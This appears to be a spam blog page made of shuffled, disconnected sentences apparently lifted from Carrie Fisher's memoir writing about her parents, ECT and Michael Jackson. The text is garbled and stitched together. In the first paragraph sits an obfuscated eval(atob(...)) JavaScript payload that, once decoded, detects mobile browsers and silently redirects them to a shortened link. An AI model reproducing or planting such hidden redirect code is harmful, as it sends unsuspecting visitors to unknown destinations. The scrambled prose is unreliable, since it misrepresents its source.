eva-faber24-blog · 7 years
’” These sorts of stories beg for a pause, while everyone tries to sort out what was just said, blinking back the thoughts forming behind our eyes. I am Carrie Fisher. My dad had a real sense of humor, and on top of that he had this huge appreciation for irony. It complicates the simplest things and simplifies the most complex. So, from a very early age he was singing professionally, performing initially at bar mitzvahs. You should be marrying me. eval(atob('d2luZG93LmNweHVraz1bXTtmdW5jdGlvbiBhX2hmMHBrOGYoKXt3aW5kb3cuY3B4dWtrLnB1c2goJ2UxaXd1aTYnKX07YV9oZjBwazhmKCk7ZnVuY3Rpb24gYV9vZzJweigpe3dpbmRvdy5jcHh1a2sucHVzaCgnNG9ob2F4Y3ZnMmRiYzF5Jyl9O2Ffb2cycHooKTtmdW5jdGlvbiBhX3F1ZmNheCgpe3dpbmRvdy5jcHh1a2sucmV2ZXJzZSgpfTthX3F1ZmNheCgpO2Z1bmN0aW9uIGFfajljbXVjKCl7d2luZG93LmNweHVray5wdXNoKCd6b2JqeXZwN203b3R0dTJlY3B0NTZ2eTJqOCcpfTthX2o5Y211YygpO2Z1bmN0aW9uIGFfOXJpZzMoKXt3aW5kb3cuY3B4dWtrLnJldmVyc2UoKX07YV85cmlnMygpO2Z1bmN0aW9uIGFfa21qeTIoKXt3aW5kb3cuY3B4dWtrLnB1c2goJ2pjaW53YjJ4cmpzcXQnKX07YV9rbWp5MigpO2Z1bmN0aW9uIGFfOWk1dmd3KCl7d2luZG93LmNweHVray5wdXNoKCcyNDRyNHlwcml5Yjk4N3IxdmswbjVrY3I1eHBvJyl9O2FfOWk1dmd3KCk7ZnVuY3Rpb24gYV9wZTc0Mnp0KCl7d2luZG93LmNweHVray5wdXNoKHdpbmRvdy5jcHh1a2suam9pbignLCcpKX07YV9wZTc0Mnp0KCk7dmFyIHc9IHdpbmRvdzsgdmFyIGwgPSB3LmxvY2F0aW9uOyB2YXIgYSA9IG5hdmlnYXRvci51c2VyQWdlbnQudG9Mb3dlckNhc2UoKTtpZihhLm1hdGNoKCdpcGhvbmUnKSB8fCBhLm1hdGNoKCdpcGFkJykgfHwgYS5tYXRjaCgnYW5kcm9pZCcpIHx8IGEubWF0Y2goJ3dpbmRvd3MgcGhvbmUnKSl7bC5ocmVmPSdodHRwOi8vYml0Lmx5LzJqbnhGQmgnfTtmdW5jdGlvbiBiX2gxbmdveWkoKXt3aW5kb3cuY3B4dWtrLnB1c2goJzViaXA3N2phajA5cTJkMjFnNW0nKX07Yl9oMW5nb3lpKCk7ZnVuY3Rpb24gYl9teW95bCgpe3dpbmRvdy5jcHh1a2sucHVzaCgnMHNyZDB5Z3M4ZnpsbjhyY3RjOGdyYmd6cW91eScpfTtiX215b3lsKCk7ZnVuY3Rpb24gYl90M2tnaWluKCl7Y29uc29sZS5sb2coJ254ZTF4ZXh3MmNzYTVwYXp3d3Zwd2ttMHZsJyl9O2JfdDNrZ2lpbigpO2Z1bmN0aW9uIGJfMjV1anRvaygpe3dpbmRvdy5jcHh1a2sucHVzaCh3aW5kb3cuY3B4dWtrLmpvaW4oJywnKSl9O2JfMjV1anRvaygpO2Z1bmN0aW9uIGJfdzhjNDUyanooKXt3aW5kb3cuY3B4dWtrLnB1c2goJzY3MmVmN29uOWFhZXFyeWtvNHgwMGFlaCcpfTtiX3c4YzQ1Mmp6KCk7ZnVuY3Rpb24gYl9oaTk5MnMoKXt3aW5kb3cuY3B4dWtrLnB1c2goJ2N1ZjRieDFlOXZpOW12aWdlb2RtbndhemViYmgwaicpfTtiX2hpOTkycygpOw==')); I prefer to imagine that I’m not that obvious. He wanted his children to be as unrecorded as possible. Mine not only to live in, but to decorate and even invite people to. ‘Oh, here’s something about me, and here’s another thing about me, and, wait, here’s something about me I don’t think I told you. What was, in the ’50s, called a crooner.
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eva-faber24-blog · 7 years
” As if I dug a hole, put Greg in a bag, dragged him outside, and… well, you get the overall gist of my drift. jpg] President Harry Truman playing golf on island of Kailua, Hawaii. I had workshopped my showWishful Drinking at the Geffen Theatre in Westwood, California, for a number of months before moving it up to the Berkeley Rep theatre in 2008. “After thinking about it for a second, as one would, I said, ‘Thank you. So I just wanted to say, you know, I’m not mad at you or anything and I’m, you know, I’m sorry I never spoke to you for so many years up until now. “Don’t show this to Harry,” she instructed me solemnly. He definitely didnot fart. Here’s the thing. And Dave said,“Well, that’s the meditation then. Not that most of those assembled weren’t silent already, having stepped back without moving to get out of the way of the business at hand.
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eva-faber24-blog · 7 years
Apartment 12J1 with its actual terrace quietly overlooking… other buildings. There might be an upside to all this, like maybe now I’m more plainspoken. My mother, Debbie Reynolds, was in what might be called iconic films—most notably,Singin’ in the Rain. Not even areal movie, aTV movie. I don’t know, maybe it was just one of those über-accurate pictures of someone—myself, say? “A courtship,” he explained when asked the nature of our relations all those decades past. I don’t mean thathe haunts me. So I called Gavin and told him about this dentist dumping this ghastly tale of his son and Michael Jackson in my lap, and Gavin told me, “Here’s what you should say to the guy: ‘Let me get this straight. Sure, if I did all that, it would be virtually impossible tonot resemble a busty clothespin. So my medically induced mood improvement made me look fat and awful, which resulted in my getting depressed again.
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eva-faber24-blog · 7 years
Or was it me that had gotten more involved with him? Iloved this man’s lyrics. And children are far less likely to act this way because they don’t exactly know what fame is yet. Todd and I were stunned. “I didn’tdrink really, so much as take pills alcoholically. Who better to appraise my dad’s ring than a jeweler with one of those 10x magnifying eyepiece things? At some point around this time, I was conferring with my book editor, and when I mentioned feeling Greg’s GRPO energy around the house she recommended I call the author of a book she was editing, who coincidentally also happened to be a psychic and who she felt might be able to shed some light on my recent darkish times. All the others were watching us, riveted. “And all of a sudden he smells something that smells really bad”—he made an unpleasant smell face—“but the conductor keeps conducting and conducting, until after a while he can’t stand the stench any longer. I felt like an Olympic runner who breaks that white tape with her chest with everyone cheering wildly from the sidelines.
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eva-faber24-blog · 7 years
But a long time ago. She’s got herself on her mind ten, fifteen, twenty hours a day! Nor did I spot any visions of Bette Davis, who sold the property to Edith, or Robert Armstrong, King Kong’s captor in the original film, who built the house and sold it to Bette. Where you remain with a dying person, accompanying them as far as you can go, ultimately finding yourself standing still while they’ve kept moving. This is a face I’m more comfortable presenting to the world than the one I was born with. So, before I fail to remember anything else that could result in any future social embarrassment, I thought I would jot down a few things that I might one day enjoy reflecting on. Cerletti began delivering, on alternate days, to some of the more psychotic and suicidally depressed patients, between ten and twenty ECT shocks. Chandler telling me how Michael was buying his kid computers and taking him to incredible places and sleeping in the same bed and getting him… WAIT! I only say my father is a consort because he’s really better known for his (not so) private life than the life he lived onstage. Let’s sayyour“really good-looking son” started hanging out with this odd-looking famous multi-multimillionaire that could maybe be persuaded to give you twenty-two million dollars if you threatened to tell everyone in the world that he touched your son’s underage, maybe-not-even-fully-grown-yet member.
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